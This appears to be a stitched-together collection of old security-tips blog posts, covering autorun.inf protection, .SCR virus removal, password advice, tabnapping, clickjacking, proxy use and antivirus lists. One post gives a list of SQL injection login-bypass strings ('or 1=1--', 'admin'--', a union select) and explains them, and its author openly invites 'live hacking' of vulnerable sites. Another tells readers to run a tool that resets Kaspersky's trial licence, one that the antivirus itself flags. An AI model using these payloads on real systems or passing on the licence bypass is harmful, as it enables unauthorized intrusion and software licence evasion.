What is ” Autorun.inf ” ?

Autorun.inf is basically contains small code,which run itself when ever we plug-in USB drive or any external R/W media to the Computer. The Autorun.if is harmful to the windows PC only. The Linux system are not effected by this.

How the Autorun.inf Code look like ?

Autorun.inf have a simple code, which execute itself its like a recursion program.

[AUTORUN]
OPEN=autorunfolder/setup.exe
In the above code ‘autorunfolder’ is a folder in removal drives which contain infected executable file that uses AUTORUN file for it’s propagation.

How to keep Autorun.inf away from your PC :-

• Step1: Create four folders in the root directory of your Removable drive(USB) with names Autorun.inf, Recycle, Recycler and Recycled(these folders are created by viruses to complete their process in every drive).
• Step2: Go to Start>Run and type cmd to open Command Prompt. If USB drive is ‘F‘ then type F: and press Enter or if you are trying this on any disk partition then specify that drive letter in place of ‘F‘
• Step3: Now type the following commands one after the other.While you are executing these commands console may ask you like this “Are you sure(Y/N)” then type Y and press Enter.

F:>attrib -h -a -r -s F:autorun.inf
F:>cacls autorun.inf /c /d administrators

Screen shot is below :-

What is .SCR Extension?

The SCR file type is primarily associated with “script” which is started to be used to transmit a Trojan.

From where the .SCR Virus comes from?

The SCR virus mostly comes along with the screen savers, ZIP files (with double extension), an executable file etc..

Most antivirus programs cannot remove this virus because it is write protected, however we can delete the file causing the virus by following the below steps.

How to Remove/Delete .SCR Virus from the Computer?

1. Shutdown the computer and restart it using safe mode (press F8 key while booting)
2. Once the loading of windows is completed, go to C:\WINDOWS\system (or the folder you’ve installed your operating system)
3. Find the file named “WINLODR.SCR” and delete it.
4. Now, restart your computer in the normal mode (without pressing any key) and you can see that the virus has been removed.

There above are the easy 4 steps to delete the .SCR virus from your computer.

Plz comment if you have any trouble in removing .SCR virus.

Most of the tools that are used to break into the secure system uses brute force attact. Check out at Wiki .

Check Strength of Your Password Online :-

* Open site http://howsecureismypassword.net/
* Enter your desired password, that you want to check the strength.
* Done.

There are some tips that, for choosing the stong password. Go through the last past of openhippo Web :- http://openhippo.com/2010/09/06/secure-passwords-should-not-include/

The importance of picking a good, secure password can’t be emphasized enough. Your password is the way the computer verifies that someone logging in is really you, so pick something that cannot be guessed by others. The top reasons people gain unauthorized acesses to a password protected system is: They guessed someone’s password. (often because they found it on a piece of paper next to the victim’s computer or because they saw the person type the password in, but also because they use software programs that are VERY good at guessing common passwords.)

Secure Passwords Should Not Include:-

* Your name
* Your spouse’s name
* Your parent’s name
* Your pet’s name
* Your child’s name
* Names of close friends or coworkers
* Names of your favorite fantasy characters
* Your boss’s name
* Anybody’s name
* The name of the operating system you’re using
* The hostname of your computer
* Your phone number
* Your license plate number
* Any part of your social security number
* Anybody’s birth date
* Other information that is easily obtained about you
* Words such as wizard, guru, gandalf, and so on.
* Any username on the computer in any form (as is, capitalized, etc.)
* A word in the English dictionary
* A word in a foreign dictionary
* A place
* A proper noun
* Passwords of all the same letter
* Simple patterns on the keyboard, like qwerty
* Any of the above spelled backwards
* Any of the above followed or prepended by a single digit.

So, before you choose password, you should be aware not to choose the keys among the above list.

It is the first ever web-browser that provide you online scanning of viruses.

What are the Features that you can expect from Epic Browser :-

a) Built in Antivirus: Scan downloads automatically. Scan your system manually. Epic Kills any viruses it finds.

b) Malicious Website warnings: We’ll warn you if you’re about to visit a web site known to host viruses or malware.

c) Anti Phishing support.

d) More than 1500 +  application programs.

e) More than 1500  + Indian Origin template themes.

f) One Click deletion of cookies, flash data and no storing of your personal data.

g) Support all languages of India.

Epic web browser is really a robust browser. Its a Mozilla powered.

Download and Install Epic browser, its free and easy to install

Download Epic browser :-  http://www.epicbrowser.com/

Thanks and Enjoy the Indian origin web browser.

So far, the scams have mostly been used to direct unsuspecting surfers to websites selling pharmaceuticals. However, it’s likely they will soon be used to send people top infected sites. For the moment, cases of malware distribution have not been reported, but it’s just a matter of time.

Clickjacking works by taking advantage of the Facebook ‘like’ button, which other websites can embed on their own pages. If you click the button, the fact that you ‘liked’ the page is published on your Facebook news feed and can be seen by your friends. If they in turn click on the message, they are directed to the website.

However, rogue websites can hide these buttons on a page so that, if you click anywhere on the page, a message directing people to the website will be posted on your news feed. So be aware of it.

– A phishing is illegal way acquiring usename and password of the user by using fake website looks same as a real one.

In the past phishing was attempted by just sending the fake URL but it contain same as the real site have. When the user enter its username and the password, the user credential goes straight  to the hacker or phisher page manager.

But now a days a new type of phishing have been evolved that is know as “TABNAPPING” .

What is Tabnapping ?

Its a new kind of phishing attempted, in which the hacker doesn’t sent the URL if phisher page, but what actually he/she send is the simple webpage containing the java-script ( tabnapping javascript ).

What does the Java Script Do in Tabnapping ?

The Javascript automatically redirect to the phishing page, when ever we are switching between the other tabs.

When the user return back, he /she doesn’t see the URL of the webpage, instead he/she fill the username and password into it, and guess what happen. His/her account is hacked by tabnapping, or tabjacking.

If you want to TRY

Follow the steps :-

1. Just Refresh this page. or You can go directly to next step.

2. Go to other tabs,open new tabs ( like 4 or 5 ) .

3. Just return back to this page.. yoooo whats you get ( this is a phishing page) . Don’t worry right now, I have used a Image , instead you can call a phisher page.
4. Just Click on that page, You will redirect to original page

Note :- Don’t harm the people.

Source : http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

Facebook and Youtube both are doen’t agree with the pakitani court about the shutdown of their site. Facbook and Youtube says that its in the agreement license.

Access Blocked youtube and facebook sites in pakistan :-
There are many softwares and proxy-sites that you can switch to, but following are 3 basic and best way by which you can browse youtube and facebook in pakistan.

1. Your-Freedom Software: This is a proxy based sites, its free software. You can browse blocked sites in it.

2. Ultra Surf :- Ultra Surf is most popular utility available to access blocked sites. You need to change your internet connection settings to access websites including Facebook and Youtube.

3. Proxy Sites:- There are around 1000 or more proxy sites available on Internet. You google out ” Best Proxy sites” or “working proxy sites”. You will surely get good proxy sites to browse facebook or youtube in pakistan. One I know that is www.hidemyass.com

Enjoy and access Facebook and Youtube sites in Pakistan.

For Gmail Users :

1. Right corner, Click on the Settings OR Just see at the TOP  ( Click on to Create Filters )

2. Create a Filter.

3. In the FROM tab, Type the email address ,that you want to block. If you want to block the emails abc@xyz.com than

4. Or if you want to block the whole domain than you have to just type *@xyz.com . This will block all the incoming emails from the domain address.

5 Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.

For the Yahoo Users

1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. In the left panel select the option Filters and click on create or edit filters
5. Now just click Add, now you can add the email address that you want to block the incoming emails.

Enjoy

The internet is vast and many hackers and intruders sit around you to grab/ sniff your passwords and user information’s. To keep this security alert facebook introduced a new feature that will tell the user about his/her account last login details . This feature is same as Gmail is using to tell, when was the last login and from which IP address was made. The two or more person can access Gmail account at the same time but you cant make two log-ins at the same time in facebook.

facebook login

To use this security feature:-

Go to your “account settings“  then “account security” change its to YES.

Facebook contains many new and good security and privacy features. Just go to the Account settings and then Privacy Tab. See all and modify according to your level of privacy mode.

There is good trick in the Firefox to reopen the closed tabs.

Follow this :- Cltr + Shift + T

and you are done, the last closed tab will reopen and you can now continue your work easily, without wasting your precious time.

Enjoy the Trick and tell your friends also.

Also See :- Track Your Lost Laptop With FireFound Add-on

Also See :-Firefox tricks : Speedup your Surfing

The FireFound Add-on helps you to track you lost PC. After Installing this add-on to your firefox browser, and the FireFound sends the secure messages to your email ID every time whenever your PC changes the IP address. So you can easily track the IP address and your lost PC.

Apart from tracking your lost PC, this add-on adds more feature to your PC :-

Enable Emergency Data Encryption :- By this feature it will delete all your saved passwords, deletes the browsing history, download history, delete the search history, cache deletion, cookies, active logins etc.

Download FireFound Add-On :- Download

Also Read :- Firefox tricks : Speedup your Surfing

Share Your Knowledge.

You can simply use the twitter DM deleter ( “twitter Direct message deleter” ). It is a freeware tool that you can use to delete all the spam in your twitter account.

twitter dm deleter

Now you can look multiple twitter messages in one window.

twitter message deleter

Download Twitter DM Deleter

- The biggest headache. There can be no doubt that Conficker.C has been the most obnoxious virus over the last 12 months. It first appeared on December 31, 2008, and has spent the last year causing serious infections to companies and home users alike. The insidious and tenacious nature of this malicious code has earned it first place in our ranking.

- The Harry Potter of viruses. Although there is no reference to the world’s most popular fictional wizard, the on-screen messages Samal.A displays are all about magic. When it infects a computer, users will see the message “Ah ah you didn’t say the magic word” and the cursor then flickers waiting for users to enter a word. The truth is, it doesn’t matter what is entered, because after three attempts, the phrase “Samael has come. This the end” will be displayed and the computer is restarted.

- V for Vendetta. We still don’t know who is the real target of this vendetta, but DirDel.A wreaks vengeance on infected users, progressively replacing folders in different directories with copies of itself. The worm is carried in a file called Vendetta.exe with a typical Windows folder icon.

- Plane nuisance. The Sinowal.VZR Trojan has infected thousands of computers under the guise of plane tickets supposedly purchased by the user.

-The all-action virus. We are talking about Whizz.A. Once infected,

Whizz.A virus

computers will start emitting a series of beeps, the mouse pointer moves uncontrollably around the screen, the CD/DVD tray opens and closes, while the screen is ‘decorated’ with a row of bars like those in the image below.

- The snooper. Waledac.AX ensnares its victims by claiming to offer a free application for reading SMS messages on anyone’s cell phone. Ideal for those that want to check up on their partners. Perhaps that’s why so many users fell victim to this intelligent virus.

- The most affectionate. BckPatcher.C tops this category, as it changes the desktop wallpaper to an image reading “virus kiss 2009”. What a charmer!

- A touch of the sniffles. We couldn’t fail to mention here a couple of the viruses, WinVNC.A and Sinowal.WRN that used the widespread alarm surrounding swine flu to trick users and infect their systems.

- And the award for incompetent newcomer goes to… Ransom.K. This Trojan encrypts documents on infected computers, and then asks for a $100 ransom to release them. However its creator, probably lacking in experience, included a programming error which allows users to release the files with a simple key combination.

- The most deceitful. This year, the winner in this category is FakeWindows.A, which infects users by passing itself off as a license activation process for Windows XP.

- The party animal. Banbra.GMH arrives in an email promising photos of Brazilian parties (with dancing girls included)… Who could resist?

Source : Panda Security

Share your Knowledge

To keep this many anitvirus, updated theirs virus library into the software. The following are the Top antivirus in 2010 according to the user comments.

1. Kaspersky Antivirus 2010: Download

kaspersky-2010

2. Shield Deluxe – Antivirus Protection: Download

Shield Deluxe

3.Trend Micro Antivirus Internet Security 2010: Download

Trend Micro Antivirus

4. Norton Antivirus 2010 : Download

Norton Antivirus 2010

5. Panda Antivirus Pro 2010: Download

Panda Antivirus Pro 2010

6. ESET NOD32 Antivirus: Download

ESET NOD32 Antivirus

7. ZoneAlarm Anti-virus 2010 : Download

ZoneAlarm Anti-virus

8. AVG Free Antivirus 2010 : Download

avg free 2010

9. BitDefender Antivirus 2010 : Download

BitDefender Antivirus

10. McAfee Antivirus 2010 : Download

McAfee Antiyirus

These are the top 10 antivirus in the starting of 2010. Last year some of the antivirus were are the same position like Kaspersky, Nortan, Node32..

Use the antivirus and that also updated version, to protect your data.

I am a Ubuntu guy, so I less go in the windows but You might be using the kaspersky to clean up your PC.

Kaspersky gives a 30 days trail pack, to use their antivirus, after that kaspersky is disabled and its not possible to use the kaspersky antivirus, even you uninstall the kaspersky.

How to use the Kaspesky antivirus after 30 days trial.

Here are the steps :

1. Unistall the Kaspersky.

2. install the tool( kaspesky will say, that it is virus) but its not, i used ans my friend are using that tool to reset the kaspersky.

3. Download the tool [ here ]

4. Now run the tool, it will clean the Kapsersky restrickted registry keys.

5. Now you install the Kapsersky, it will activate for the another 30 days.

SO after 30 days do the same..

ENjoy your PC

I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.

If someone is pro of breaking into venerable systems and sites. please share your expriences/

‘ or 0=0 –
‘ or 0=0 –’
‘ or 0=0 #
” or 0=0 –
” or 0=0 –’
‘” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
” or 1=1–
or 1=1–
‘ or a=a–’
‘ or a=a #
‘ or a=a–
‘ or “a”=”a
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or “a”=”a

‘) or (‘a’='a

admin’–
‘ or 1=1–
‘” or 1=1–
‘ union select 1, ‘Eyeless’, ‘ez2do’, 1–
admin’–
administrator’–
superuser’–
test’–

This is the short list but these SQL injection strings are much powerful.

I have another hint :

Some of the SQL supporting system doesn’t support.

For example
” or “a”=”a
‘) or (‘a’='a

on some databases one would work, other wouldn’t.. first one would enclose the username (or pass) in quotes… first it would CLOSE the quotes (making it “”) and then says.. or “a”=”a.. the last quote would be closeing the final a.. and “a”=”a” is always true, so that would be how it works
however, the second uses (‘Username’).. and changing it to say “(”) or (‘a’='a’)”

Enjoy the HACK DAY

Phishing page is similar look and feel page of any real site.

Yesterday on the gmail blog I read about how to choose the smart passwords.

- Use Different password at different levels :- Meaning is that don’t always use a single password everywhere. It is not good sense that somebody is using the gmail password and twitter , facebook or his/her online bank account password same. It is always recommended to choose different password at different levels.

- Don’t use your personal data in password:- So while choosing the password, you might think of easy to remember its good but what first comes in your mind is the your “ personal related password string “, That really bad way, don’t use your personal information in the password.

-Don’t use common words or sequences:- Ok, here you are suggest not to choose your password containing common words or sequences. Example:-
“smartboy” or “coolguy” is not the strong password, so it can be cracked easily. You can modify above password as ” sm4rtB0y” and ” C0oLg8y “.

- Make sure that password recovery question is also secure :- Securing the password is not a winning a battle but you may also think of your security question, Hackers uses this way and also easily crack the email accounts and other accounts, so choose the strong question and you are suggested to Choose your own question, never give the hint which can directly understood.

Gmail CAPTCHA Worm

Once a computer is infected with W32.Gaptcha, the worm launches the Internet Explorer browser and goes to Gmail’s new account registration page. It begins to fill in random names of fictitious users. When confronted with a CAPTCHA, the worm sends the image to a remote server for processing, wrote Do Manh Dung, senior malware researcher said.

A CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is the distorted text that a person must solve before a new account can be created. It used to be hard for computers to translate the text, but improvements in OCR (optical character recognition) technology have overcome that barrier. In some cases, spammers are believed to employ people in low-income countries to figure out the CAPTCHA in order to gain new e-mail accounts.

Once a new registration is complete, the account details are then e-mailed to a spammer. After too many account registrations, Google will eventually block the particular computer creating the accounts. The worm then removes itself, Dung wrote.

Google officials contacted in London did not have a comment on the latest worm, but it and other companies that provide free e-mail accounts have been besieged over the last few years by spammers using sophisticated techniques to create fake accounts.

Free e-mail accounts are valuable to spammers. E-mail sent from those accounts has a better chance of making it past antispam filters since it comes a trusted domain, although companies use other methods such as text analysis to pluck out rubbish e-mail.

Use the good Antivirus( I recommend Kaspersky 7 or Above )

Scammers taking advantage of heightened public  interest to spread malware.

Today saw a new scam affecting users of the popular Twitter micro-blogging site, while security experts reported that hackers are taking advantage of heightened public interest in Twitter-related security issues to spread malware.

The latest Twitter problems appear to be a new raft of messages being posted to the Twitter feeds of users containing the words and link, “You’ll like this one! Check out www.TheSmartEcard.com”, or “Retweet: You’ll love this one! Check out www.TheSmartEcard.com”.
Advertisement

According to Twitter, the problem is a “scam/phishing site” rather than something more malicious. Graham Cluley, senior technology consultant at security vendor Sophos, warned users to avoid clicking on the link.

“Hopefully, it should be obvious from the web site’s opening page of legalese banning staff from Twitter, MySpace, Facebook, Microsoft and Google, that something odd is afoot – even before it starts to quiz you for personal information,” he wrote in his blog.

“But if not, let me just say that visiting the web site is not recommended.”

The scam follows hot on the heels of more worm attacks over the past few days. On Friday it emerged that a new version of the Mikeyy cross-site scripting worm was trying to spread across the network.

The author sent messages to celebrity users such as Ashton Kutcher and Oprah Winfrey, with the intention of spreading the worm more quickly, as these profiles have large numbers of followers.

“If you suspect you have been affected, clean out your Twitter profile and settings of any content that you did not add yourself, and – although it may not be the case that it has been compromised – consider using a more secure password,” wrote Cluley.

Then over the weekend, another version of the worm appeared to be infecting profiles with messages including jokes, purportedly authored by the same hacker, Mikeyy.

Some experts have argued that Twitter has looked amateurish and unprepared in its response to the flurry of attacks, but the site’s administrators noted the attacks were both short lived and dealt with appropriately.

“Still, we suggest that you avoid viewing the profiles of users posting uncharacteristic or otherwise suspicious tweets,” wrote the firm on its status page.

Anti-malware firm Trend Micro, meanwhile, has noted that hackers are using public interest and the high level of media coverage of the worm attacks on Twitter to spread more malware. Google searches for ‘Twitter worm’ and ‘Mikeyy’ bring back malicious URL links on the first page of results, according to a blog posting by Trend AV engineer Jasper Manuel.

Visiting the site will trigger the download of a Trojan onto the user’s PC, he said, although the firm’s engineers are still trying to verify if the Trojan can download other malware too.

Source From :- www.vnunet.com